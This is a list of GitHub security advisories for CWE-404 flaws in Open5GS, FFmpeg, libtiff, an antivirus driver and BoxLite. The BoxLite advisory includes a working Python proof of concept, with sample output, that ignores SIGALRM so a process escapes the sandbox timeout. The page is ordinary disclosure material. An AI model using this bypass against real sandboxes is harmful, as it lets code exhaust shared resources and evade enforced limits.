CWE-404
Allowed-with-ReviewImproper Resource Shutdown or Release
Abstraction: Class · Status: Draft
The product does not release or incorrectly releases a resource before it is made available for re-use.
1219 vulnerabilities reference this CWE, most recent first.
GHSA-XG8C-HF2J-JJW5
Vulnerability from github – Published: 2026-05-11 18:31 – Updated: 2026-05-11 18:31A weakness has been identified in Open5GS up to 2.7.7. Impacted is the function ogs_nnrf_nfm_handle_nf_profile of the file lib/sbi/nnrf-handler.c of the component NRF. This manipulation causes denial of service. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The pull request to fix this issue awaits acceptance.
{
"affected": [],
"aliases": [
"CVE-2026-8291"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-11T16:17:43Z",
"severity": "LOW"
},
"details": "A weakness has been identified in Open5GS up to 2.7.7. Impacted is the function ogs_nnrf_nfm_handle_nf_profile of the file lib/sbi/nnrf-handler.c of the component NRF. This manipulation causes denial of service. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The pull request to fix this issue awaits acceptance.",
"id": "GHSA-xg8c-hf2j-jjw5",
"modified": "2026-05-11T18:31:45Z",
"published": "2026-05-11T18:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8291"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs/issues/4456"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs/pull/4534"
},
{
"type": "WEB",
"url": "https://github.com/open5gs/open5gs"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/808508"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/362588"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/362588/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-XGCJ-HC3F-6MJC
Vulnerability from github – Published: 2025-02-17 06:30 – Updated: 2025-02-17 06:30A vulnerability was found in FFmpeg up to 7.1. It has been rated as problematic. Affected by this issue is the function mov_read_trak of the file libavformat/mov.c of the component MOV Parser. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The patch is identified as 43be8d07281caca2e88bfd8ee2333633e1fb1a13. It is recommended to apply a patch to fix this issue.
{
"affected": [],
"aliases": [
"CVE-2025-1373"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-17T04:15:08Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in FFmpeg up to 7.1. It has been rated as problematic. Affected by this issue is the function mov_read_trak of the file libavformat/mov.c of the component MOV Parser. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The patch is identified as 43be8d07281caca2e88bfd8ee2333633e1fb1a13. It is recommended to apply a patch to fix this issue.",
"id": "GHSA-xgcj-hc3f-6mjc",
"modified": "2025-02-17T06:30:39Z",
"published": "2025-02-17T06:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1373"
},
{
"type": "WEB",
"url": "https://ffmpeg.org"
},
{
"type": "WEB",
"url": "https://git.ffmpeg.org/gitweb/ffmpeg.git/commit/43be8d07281caca2e88bfd8ee2333633e1fb1a13"
},
{
"type": "WEB",
"url": "https://trac.ffmpeg.org/attachment/ticket/11460/poc"
},
{
"type": "WEB",
"url": "https://trac.ffmpeg.org/ticket/11460"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.295982"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.295982"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.496930"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-XGH3-993Q-R2X8
Vulnerability from github – Published: 2025-08-05 00:30 – Updated: 2025-08-05 00:30A vulnerability classified as problematic was found in libtiff 4.6.0. This vulnerability affects the function PS_Lvl2page of the file tools/tiff2ps.c of the component tiff2ps. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is 6ba36f159fd396ad11bf6b7874554197736ecc8b. It is recommended to apply a patch to fix this issue. One of the maintainers explains, that "[t]his error only occurs if DEFER_STRILE_LOAD (defer-strile-load:BOOL=ON) or TIFFOpen( .. "rD") option is used."
{
"affected": [],
"aliases": [
"CVE-2025-8534"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-05T00:15:56Z",
"severity": "LOW"
},
"details": "A vulnerability classified as problematic was found in libtiff 4.6.0. This vulnerability affects the function PS_Lvl2page of the file tools/tiff2ps.c of the component tiff2ps. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is 6ba36f159fd396ad11bf6b7874554197736ecc8b. It is recommended to apply a patch to fix this issue. One of the maintainers explains, that \"[t]his error only occurs if DEFER_STRILE_LOAD (defer-strile-load:BOOL=ON) or TIFFOpen( .. \"rD\") option is used.\"",
"id": "GHSA-xgh3-993q-r2x8",
"modified": "2025-08-05T00:30:27Z",
"published": "2025-08-05T00:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8534"
},
{
"type": "WEB",
"url": "https://drive.google.com/file/d/15JPA3kLYiYD-nRNJ8y8HmnYjhv9NE7k6/view?usp=drive_link"
},
{
"type": "WEB",
"url": "https://gitlab.com/libtiff/libtiff/-/commit/6ba36f159fd396ad11bf6b7874554197736ecc8b"
},
{
"type": "WEB",
"url": "https://gitlab.com/libtiff/libtiff/-/issues/718"
},
{
"type": "WEB",
"url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/746"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.318664"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.318664"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.617831"
},
{
"type": "WEB",
"url": "http://www.libtiff.org"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-XHWR-F5XV-7GQC
Vulnerability from github – Published: 2023-03-17 09:30 – Updated: 2023-03-23 18:30A vulnerability was found in Filseclab Twister Antivirus 8. It has been rated as critical. This issue affects some unknown processing in the library fildds.sys of the component IoControlCode Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223289 was assigned to this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2023-1444"
],
"database_specific": {
"cwe_ids": [
"CWE-404",
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-17T07:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in Filseclab Twister Antivirus 8. It has been rated as critical. This issue affects some unknown processing in the library fildds.sys of the component IoControlCode Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223289 was assigned to this vulnerability.",
"id": "GHSA-xhwr-f5xv-7gqc",
"modified": "2023-03-23T18:30:20Z",
"published": "2023-03-17T09:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1444"
},
{
"type": "WEB",
"url": "https://drive.google.com/file/d/1KrkezTwgmt5CnhzlyyWVNLIAeiMvuDEr/view"
},
{
"type": "WEB",
"url": "https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/CVE-2023-1444"
},
{
"type": "WEB",
"url": "https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/unassigned11"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.223289"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.223289"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XJHV-PP2R-6F82
Vulnerability from github – Published: 2026-05-29 21:45 – Updated: 2026-06-11 14:07Summary
BoxLite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. BoxLite allows users to configure a timeout for services running inside the virtual machine. When the timeout is triggered, BoxLite sends a signal to kill the process. However, instead of using the uncatchable SIGKILL signal, BoxLite uses the catchable SIGALRM signal. Malicious code running inside the sandbox can exploit this vulnerability to continue running after the timeout is triggered, leading to resource exhaustion within the virtual machine and affecting the availability of the BoxLite service.
Details
- ExecRequest with timeout_ms arrives at Execution service
File: guest/src/service/exec/mod.rs Function: spawn_execution() (line 315) Code:
// Step 3: Start timeout watcher (if requested)
if req.timeout_ms > 0 {
timeout::start_timeout_watcher(
state,
execution_id.clone(),
std::time::Duration::from_millis(req.timeout_ms),
);
}
Issue: Any nonzero timeout_ms triggers the timeout watcher. The host expects this to kill the process after the specified duration.
- Timeout watcher sends SIGALRM instead of SIGKILL
File: guest/src/service/exec/timeout.rs Function: start_timeout_watcher() (line 13) Code:
pub(super) fn start_timeout_watcher(
exec_state: ExecutionState,
exec_id: String,
timeout: Duration,
) {
tokio::spawn(async move {
tokio::time::sleep(timeout).await;
// Kill process with SIGKILL ← comment says SIGKILL
use nix::sys::signal::Signal;
if exec_state.kill(Signal::SIGALRM).await { // ← but sends SIGALRM
info!(execution_id = %exec_id, "killed on timeout");
}
});
}
Issue: The comment on line 21 explicitly states "Kill process with SIGKILL", but line 23 sends Signal::SIGALRM. SIGALRM (signal 14) is the POSIX alarm signal and is catchable/ignorable; SIGKILL (signal 9) cannot be caught or ignored. This is a code error — wrong signal constant used.
- exec_state.kill() passes the signal through unchanged
File: guest/src/service/exec/state.rs Function: kill() (line 325) Code:
pub async fn kill(&self, signal: nix::sys::signal::Signal) -> bool {
let inner = self.inner.lock().await;
if let Some(ref handle) = inner.handle {
handle.kill(signal).is_ok()
} else {
false
}
}
Issue: No override of the signal — the wrong signal (SIGALRM) is delivered directly to the process.
- ExecHandle.kill() delivers SIGALRM to the process
File: guest/src/service/exec/exec_handle.rs Function: kill() (line 335) Code:
pub fn kill(&self, signal: Signal) -> BoxliteResult<()> {
use nix::sys::signal::kill;
kill(self.pid, signal).map_err(|e| {
BoxliteError::Internal(format!(
"Failed to send signal {} to process {}: {}",
signal, self.pid, e
))
})
}
Issue: Sends SIGALRM (signal 14) to the process. Any process that has registered a custom SIGALRM handler (e.g., via signal(SIGALRM, handler)) or set SIGALRM to SIG_IGN will not be terminated.
As seen from the code, the developer indicated in the comments that SIGKILL should be sent to kill the timed-out process, but SIGALRM was used in the implementation, resulting in the vulnerability.
PoC
-
Install Boxlite following the official tutorial.
-
Run the following Python script:
```python #!/usr/bin/env python3 """ PoC: BoxLite Execution Timeout Bypass via SIGALRM
Reproduces the vulnerability described in: "Hunt Report: Exec Timeout Enforcement Bypass via SIGALRM Misuse"
Root cause: guest/src/service/exec/timeout.rs sends Signal::SIGALRM (signal 14, catchable/ignorable) instead of Signal::SIGKILL (signal 9, uncatchable).
Exploitation: Any process that calls signal(SIGALRM, SIG_IGN) will survive past its configured timeout and run indefinitely.
Usage: cd ~/Downloads/boxlite_poc source .venv/bin/activate python3 poc_sigalrm_bypass.py """
import asyncio import time
import boxlite
# ----------------------------------------------------------------------------- # Test programs (Python, so no gcc required) # -----------------------------------------------------------------------------
# Control: no special signal handling — SIGALRM's default action is termination NORMAL_PROCESS = """ import sys, time, os, signal seconds = int(sys.argv[1]) if len(sys.argv) > 1 else 8 print(f"PID {os.getpid()}: normal process (default SIGALRM), running for {seconds}s", flush=True) for i in range(1, seconds + 1): time.sleep(1) print(f"PID {os.getpid()}: t+{i}s alive", flush=True) print(f"PID {os.getpid()}: finished", flush=True) """
# Exploit: installs SIG_IGN for SIGALRM — one line bypass IGNORE_SIGALRM = """ import sys, time, os, signal seconds = int(sys.argv[1]) if len(sys.argv) > 1 else 8 signal.signal(signal.SIGALRM, signal.SIG_IGN) # <-- bypass print(f"PID {os.getpid()}: SIGALRM=SIG_IGN, running for {seconds}s", flush=True) for i in range(1, seconds + 1): time.sleep(1) if i > 3: print(f"PID {os.getpid()}: t+{i}s STILL ALIVE (PAST 3s TIMEOUT!)", flush=True) else: print(f"PID {os.getpid()}: t+{i}s alive", flush=True) print(f"PID {os.getpid()}: WORKLOAD COMPLETE - TIMEOUT WAS BYPASSED", flush=True) """
TIMEOUT_S = 3.0 # configured timeout WORKLOAD_S = 8 # process wants to run for 8 seconds
# ----------------------------------------------------------------------------- # Helper # -----------------------------------------------------------------------------
async def run_test(box, name, script, timeout): print(f"\n{'=' * 70}") print(f"TEST: {name}") print(f" timeout={timeout}s" if timeout else " timeout=None (disabled)") print(f"{'=' * 70}") t0 = time.time() try: result = await box.exec("python3", "-c", script, str(WORKLOAD_S), timeout=timeout) elapsed = time.time() - t0 print(f" [RESULT] exit_code={result.exit_code}, elapsed={elapsed:.2f}s") print(" [OUTPUT]") for line in result.stdout.strip().splitlines(): if line.strip(): print(f" {line}") return { "elapsed": elapsed, "exit_code": result.exit_code, "timed_out": False, "stdout": result.stdout, } except boxlite.TimeoutError as e: elapsed = time.time() - t0 print(f" [TIMEOUT] BoxLite raised TimeoutError after {elapsed:.2f}s: {e}") return {"elapsed": elapsed, "exit_code": None, "timed_out": True, "stdout": ""} except Exception as e: elapsed = time.time() - t0 print(f" [ERROR] {type(e).name}: {e} (elapsed {elapsed:.2f}s)") return {"elapsed": elapsed, "exit_code": None, "timed_out": False, "stdout": ""}
# ----------------------------------------------------------------------------- # Main # -----------------------------------------------------------------------------
async def main(): print("BoxLite PoC: Execution Timeout Bypass via SIGALRM") print("=" * 70)
async with boxlite.SimpleBox(image="python:3-alpine") as box:
print(f"Box started: {box.id}")
# Confirm SIGALRM = 14 inside the container
r = await box.exec("python3", "-c", "import signal; print(signal.SIGALRM)")
print(f"SIGALRM value inside container: {r.stdout.strip()}")
# --- Test 1: CONTROL ---
r1 = await run_test(
box,
"CONTROL: Normal process + 3s timeout (default SIGALRM=terminate)",
NORMAL_PROCESS,
TIMEOUT_S,
)
await asyncio.sleep(1)
# --- Test 2: EXPLOIT ---
r2 = await run_test(
box,
"EXPLOIT: SIGALRM=SIG_IGN + 3s timeout (BYPASS)",
IGNORE_SIGALRM,
TIMEOUT_S,
)
await asyncio.sleep(1)
# --- Test 3: BASELINE ---
r3 = await run_test(
box,
"BASELINE: Normal process, no timeout (sanity check)",
NORMAL_PROCESS,
None,
)
# --- Verdict ---
print(f"\n{'=' * 70}")
print("VERDICT")
print(f"{'=' * 70}")
print(f" CONTROL: elapsed={r1['elapsed']:.2f}s exit_code={r1['exit_code']} timed_out={r1['timed_out']}")
print(f" EXPLOIT: elapsed={r2['elapsed']:.2f}s exit_code={r2['exit_code']} timed_out={r2['timed_out']}")
print(f" BASELINE: elapsed={r3['elapsed']:.2f}s exit_code={r3['exit_code']} timed_out={r3['timed_out']}")
# exit_code == -14 means killed by signal 14 (SIGALRM), not -9 (SIGKILL)
control_killed_by_sigalrm = r1["exit_code"] == -14 and r1["elapsed"] < 5.0
exploit_survived = r2["elapsed"] > 5.0 and r2["exit_code"] == 0
print()
if control_killed_by_sigalrm:
print(" [+] Control process killed by signal 14 (SIGALRM), not signal 9 (SIGKILL)")
print(" → confirms timeout watcher sends SIGALRM instead of SIGKILL")
if exploit_survived:
print(f" [+] Exploit process ran {r2['elapsed']:.1f}s past {TIMEOUT_S}s timeout, exited normally")
print(" → SIGALRM was absorbed by SIG_IGN, timeout completely bypassed")
if exploit_survived and control_killed_by_sigalrm:
print()
print(" *** VULNERABILITY CONFIRMED ***")
print(f" Fix: change Signal::SIGALRM → Signal::SIGKILL in")
print(f" guest/src/service/exec/timeout.rs")
elif not exploit_survived:
print(" NOT CONFIRMED: exploit process was also terminated at timeout")
else:
print(" INCONCLUSIVE")
if name == "main": asyncio.run(main())
```
Sample output:
``` $ python3 poc_sigalrm_bypass.py BoxLite PoC: Execution Timeout Bypass via SIGALRM ====================================================================== Box started: W0oCKYIWga2t SIGALRM value inside container: 14
====================================================================== TEST: CONTROL: Normal process + 3s timeout (default SIGALRM=terminate) timeout=3.0s ====================================================================== [RESULT] exit_code=-14, elapsed=3.01s [OUTPUT] PID 3: normal process (default SIGALRM), running for 8s PID 3: t+1s alive PID 3: t+2s alive
====================================================================== TEST: EXPLOIT: SIGALRM=SIG_IGN + 3s timeout (BYPASS) timeout=3.0s ====================================================================== [RESULT] exit_code=0, elapsed=8.14s [OUTPUT] PID 4: SIGALRM=SIG_IGN, running for 8s PID 4: t+1s alive PID 4: t+2s alive PID 4: t+3s alive PID 4: t+4s STILL ALIVE (PAST 3s TIMEOUT!) PID 4: t+5s STILL ALIVE (PAST 3s TIMEOUT!) PID 4: t+6s STILL ALIVE (PAST 3s TIMEOUT!) PID 4: t+7s STILL ALIVE (PAST 3s TIMEOUT!) PID 4: t+8s STILL ALIVE (PAST 3s TIMEOUT!) PID 4: WORKLOAD COMPLETE - TIMEOUT WAS BYPASSED
====================================================================== TEST: BASELINE: Normal process, no timeout (sanity check) timeout=None (disabled) ====================================================================== [RESULT] exit_code=0, elapsed=8.09s [OUTPUT] PID 5: normal process (default SIGALRM), running for 8s PID 5: t+1s alive PID 5: t+2s alive PID 5: t+3s alive PID 5: t+4s alive PID 5: t+5s alive PID 5: t+6s alive PID 5: t+7s alive PID 5: t+8s alive PID 5: finished
====================================================================== VERDICT ====================================================================== CONTROL: elapsed=3.01s exit_code=-14 timed_out=False EXPLOIT: elapsed=8.14s exit_code=0 timed_out=False BASELINE: elapsed=8.09s exit_code=0 timed_out=False
[+] Control process killed by signal 14 (SIGALRM), not signal 9 (SIGKILL)
→ confirms timeout watcher sends SIGALRM instead of SIGKILL
[+] Exploit process ran 8.1s past 3.0s timeout, exited normally
→ SIGALRM was absorbed by SIG_IGN, timeout completely bypassed
*** VULNERABILITY CONFIRMED ***
Fix: change Signal::SIGALRM → Signal::SIGKILL in
guest/src/service/exec/timeout.rs
```
As shown in the output, after catching the SIGALRM signal, the process can continue running, bypassing the timeout restriction.
Impact
Malicious code running inside the sandbox can exploit this vulnerability to continue running after the timeout is triggered, leading to resource exhaustion within the virtual machine and affecting the availability of the BoxLite service.
Score
Severity: Medium, Score: 6.5, rationale as follows:
- AV:N — Can be triggered by submitting code via the network API
- AC:L — No complex exploitation required; catching the signal is sufficient to bypass
- PR:L — The attacker does not need special privileges
- UI:N — The attacker does not need to interact with the victim
- S:U — This vulnerability only affects the sandbox internals and does not change the scope
- C:N/I:N/A:H — This vulnerability only affects availability, not confidentiality or integrity
Credit
This vulnerability was discovered by:
- XlabAI Team of Tencent Xuanwu Lab
- Atuin Automated Vulnerability Discovery Engine
CVE and credit are preferred.
If there are any questions regarding the vulnerability details, please feel free to reach out to Tencent Xuanwu Lab for further discussion by emailing xlabai@tencent.com.
Note
Note that the organization follows the industry-standard 90+30 disclosure policy (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that the organization reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "boxlite"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.8.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47213"
],
"database_specific": {
"cwe_ids": [
"CWE-404"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T21:45:55Z",
"nvd_published_at": "2026-06-10T23:16:48Z",
"severity": "MODERATE"
},
"details": "#### Summary\n\nBoxLite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and run OCI containers within them. BoxLite allows users to configure a timeout for services running inside the virtual machine. When the timeout is triggered, BoxLite sends a signal to kill the process. However, instead of using the uncatchable SIGKILL signal, BoxLite uses the catchable SIGALRM signal. Malicious code running inside the sandbox can exploit this vulnerability to continue running after the timeout is triggered, leading to resource exhaustion within the virtual machine and affecting the availability of the BoxLite service.\n\n#### Details\n\n1. ExecRequest with timeout_ms arrives at Execution service\n\n**File:** `guest/src/service/exec/mod.rs` **Function:** `spawn_execution()` (line 315) **Code:**\n\n```rust\n// Step 3: Start timeout watcher (if requested)\nif req.timeout_ms \u003e 0 {\n timeout::start_timeout_watcher(\n state,\n execution_id.clone(),\n std::time::Duration::from_millis(req.timeout_ms),\n );\n}\n```\n\n**Issue:** Any nonzero `timeout_ms` triggers the timeout watcher. The host expects this to kill the process after the specified duration.\n\n2. Timeout watcher sends SIGALRM instead of SIGKILL\n\n**File:** `guest/src/service/exec/timeout.rs` **Function:** `start_timeout_watcher()` (line 13) **Code:**\n\n```rust\npub(super) fn start_timeout_watcher(\n exec_state: ExecutionState,\n exec_id: String,\n timeout: Duration,\n) {\n tokio::spawn(async move {\n tokio::time::sleep(timeout).await;\n\n // Kill process with SIGKILL \u2190 comment says SIGKILL\n use nix::sys::signal::Signal;\n if exec_state.kill(Signal::SIGALRM).await { // \u2190 but sends SIGALRM\n info!(execution_id = %exec_id, \"killed on timeout\");\n }\n });\n}\n```\n\n**Issue:** The comment on line 21 explicitly states \"Kill process with SIGKILL\", but line 23 sends `Signal::SIGALRM`. SIGALRM (signal 14) is the POSIX alarm signal and is catchable/ignorable; SIGKILL (signal 9) cannot be caught or ignored. This is a code error \u2014 wrong signal constant used.\n\n3. exec_state.kill() passes the signal through unchanged\n\n**File:** `guest/src/service/exec/state.rs` **Function:** `kill()` (line 325) **Code:**\n\n```rust\npub async fn kill(\u0026self, signal: nix::sys::signal::Signal) -\u003e bool {\n let inner = self.inner.lock().await;\n if let Some(ref handle) = inner.handle {\n handle.kill(signal).is_ok()\n } else {\n false\n }\n}\n```\n\n**Issue:** No override of the signal \u2014 the wrong signal (`SIGALRM`) is delivered directly to the process.\n\n4. ExecHandle.kill() delivers SIGALRM to the process\n\n**File:** `guest/src/service/exec/exec_handle.rs` **Function:** `kill()` (line 335) **Code:**\n\n```rust\npub fn kill(\u0026self, signal: Signal) -\u003e BoxliteResult\u003c()\u003e {\n use nix::sys::signal::kill;\n kill(self.pid, signal).map_err(|e| {\n BoxliteError::Internal(format!(\n \"Failed to send signal {} to process {}: {}\",\n signal, self.pid, e\n ))\n })\n}\n```\n\n**Issue:** Sends SIGALRM (signal 14) to the process. Any process that has registered a custom SIGALRM handler (e.g., via `signal(SIGALRM, handler)`) or set SIGALRM to SIG_IGN will not be terminated.\n\n\n\nAs seen from the code, the developer indicated in the comments that SIGKILL should be sent to kill the timed-out process, but SIGALRM was used in the implementation, resulting in the vulnerability.\n\n\n\n#### PoC\n\n1. Install Boxlite following the official tutorial.\n\n2. Run the following Python script:\n\n ```python\n #!/usr/bin/env python3\n \"\"\"\n PoC: BoxLite Execution Timeout Bypass via SIGALRM\n \n Reproduces the vulnerability described in:\n \"Hunt Report: Exec Timeout Enforcement Bypass via SIGALRM Misuse\"\n \n Root cause:\n guest/src/service/exec/timeout.rs sends Signal::SIGALRM (signal 14,\n catchable/ignorable) instead of Signal::SIGKILL (signal 9, uncatchable).\n \n Exploitation:\n Any process that calls signal(SIGALRM, SIG_IGN) will survive past its\n configured timeout and run indefinitely.\n \n Usage:\n cd ~/Downloads/boxlite_poc\n source .venv/bin/activate\n python3 poc_sigalrm_bypass.py\n \"\"\"\n \n import asyncio\n import time\n \n import boxlite\n \n # -----------------------------------------------------------------------------\n # Test programs (Python, so no gcc required)\n # -----------------------------------------------------------------------------\n \n # Control: no special signal handling \u2014 SIGALRM\u0027s default action is termination\n NORMAL_PROCESS = \"\"\"\n import sys, time, os, signal\n seconds = int(sys.argv[1]) if len(sys.argv) \u003e 1 else 8\n print(f\"PID {os.getpid()}: normal process (default SIGALRM), running for {seconds}s\", flush=True)\n for i in range(1, seconds + 1):\n time.sleep(1)\n print(f\"PID {os.getpid()}: t+{i}s alive\", flush=True)\n print(f\"PID {os.getpid()}: finished\", flush=True)\n \"\"\"\n \n # Exploit: installs SIG_IGN for SIGALRM \u2014 one line bypass\n IGNORE_SIGALRM = \"\"\"\n import sys, time, os, signal\n seconds = int(sys.argv[1]) if len(sys.argv) \u003e 1 else 8\n signal.signal(signal.SIGALRM, signal.SIG_IGN) # \u003c-- bypass\n print(f\"PID {os.getpid()}: SIGALRM=SIG_IGN, running for {seconds}s\", flush=True)\n for i in range(1, seconds + 1):\n time.sleep(1)\n if i \u003e 3:\n print(f\"PID {os.getpid()}: t+{i}s STILL ALIVE (PAST 3s TIMEOUT!)\", flush=True)\n else:\n print(f\"PID {os.getpid()}: t+{i}s alive\", flush=True)\n print(f\"PID {os.getpid()}: WORKLOAD COMPLETE - TIMEOUT WAS BYPASSED\", flush=True)\n \"\"\"\n \n TIMEOUT_S = 3.0 # configured timeout\n WORKLOAD_S = 8 # process wants to run for 8 seconds\n \n \n # -----------------------------------------------------------------------------\n # Helper\n # -----------------------------------------------------------------------------\n \n async def run_test(box, name, script, timeout):\n print(f\"\\n{\u0027=\u0027 * 70}\")\n print(f\"TEST: {name}\")\n print(f\" timeout={timeout}s\" if timeout else \" timeout=None (disabled)\")\n print(f\"{\u0027=\u0027 * 70}\")\n t0 = time.time()\n try:\n result = await box.exec(\"python3\", \"-c\", script, str(WORKLOAD_S), timeout=timeout)\n elapsed = time.time() - t0\n print(f\" [RESULT] exit_code={result.exit_code}, elapsed={elapsed:.2f}s\")\n print(\" [OUTPUT]\")\n for line in result.stdout.strip().splitlines():\n if line.strip():\n print(f\" {line}\")\n return {\n \"elapsed\": elapsed,\n \"exit_code\": result.exit_code,\n \"timed_out\": False,\n \"stdout\": result.stdout,\n }\n except boxlite.TimeoutError as e:\n elapsed = time.time() - t0\n print(f\" [TIMEOUT] BoxLite raised TimeoutError after {elapsed:.2f}s: {e}\")\n return {\"elapsed\": elapsed, \"exit_code\": None, \"timed_out\": True, \"stdout\": \"\"}\n except Exception as e:\n elapsed = time.time() - t0\n print(f\" [ERROR] {type(e).__name__}: {e} (elapsed {elapsed:.2f}s)\")\n return {\"elapsed\": elapsed, \"exit_code\": None, \"timed_out\": False, \"stdout\": \"\"}\n \n \n # -----------------------------------------------------------------------------\n # Main\n # -----------------------------------------------------------------------------\n \n async def main():\n print(\"BoxLite PoC: Execution Timeout Bypass via SIGALRM\")\n print(\"=\" * 70)\n \n async with boxlite.SimpleBox(image=\"python:3-alpine\") as box:\n print(f\"Box started: {box.id}\")\n \n # Confirm SIGALRM = 14 inside the container\n r = await box.exec(\"python3\", \"-c\", \"import signal; print(signal.SIGALRM)\")\n print(f\"SIGALRM value inside container: {r.stdout.strip()}\")\n \n # --- Test 1: CONTROL ---\n r1 = await run_test(\n box,\n \"CONTROL: Normal process + 3s timeout (default SIGALRM=terminate)\",\n NORMAL_PROCESS,\n TIMEOUT_S,\n )\n await asyncio.sleep(1)\n \n # --- Test 2: EXPLOIT ---\n r2 = await run_test(\n box,\n \"EXPLOIT: SIGALRM=SIG_IGN + 3s timeout (BYPASS)\",\n IGNORE_SIGALRM,\n TIMEOUT_S,\n )\n await asyncio.sleep(1)\n \n # --- Test 3: BASELINE ---\n r3 = await run_test(\n box,\n \"BASELINE: Normal process, no timeout (sanity check)\",\n NORMAL_PROCESS,\n None,\n )\n \n # --- Verdict ---\n print(f\"\\n{\u0027=\u0027 * 70}\")\n print(\"VERDICT\")\n print(f\"{\u0027=\u0027 * 70}\")\n print(f\" CONTROL: elapsed={r1[\u0027elapsed\u0027]:.2f}s exit_code={r1[\u0027exit_code\u0027]} timed_out={r1[\u0027timed_out\u0027]}\")\n print(f\" EXPLOIT: elapsed={r2[\u0027elapsed\u0027]:.2f}s exit_code={r2[\u0027exit_code\u0027]} timed_out={r2[\u0027timed_out\u0027]}\")\n print(f\" BASELINE: elapsed={r3[\u0027elapsed\u0027]:.2f}s exit_code={r3[\u0027exit_code\u0027]} timed_out={r3[\u0027timed_out\u0027]}\")\n \n # exit_code == -14 means killed by signal 14 (SIGALRM), not -9 (SIGKILL)\n control_killed_by_sigalrm = r1[\"exit_code\"] == -14 and r1[\"elapsed\"] \u003c 5.0\n exploit_survived = 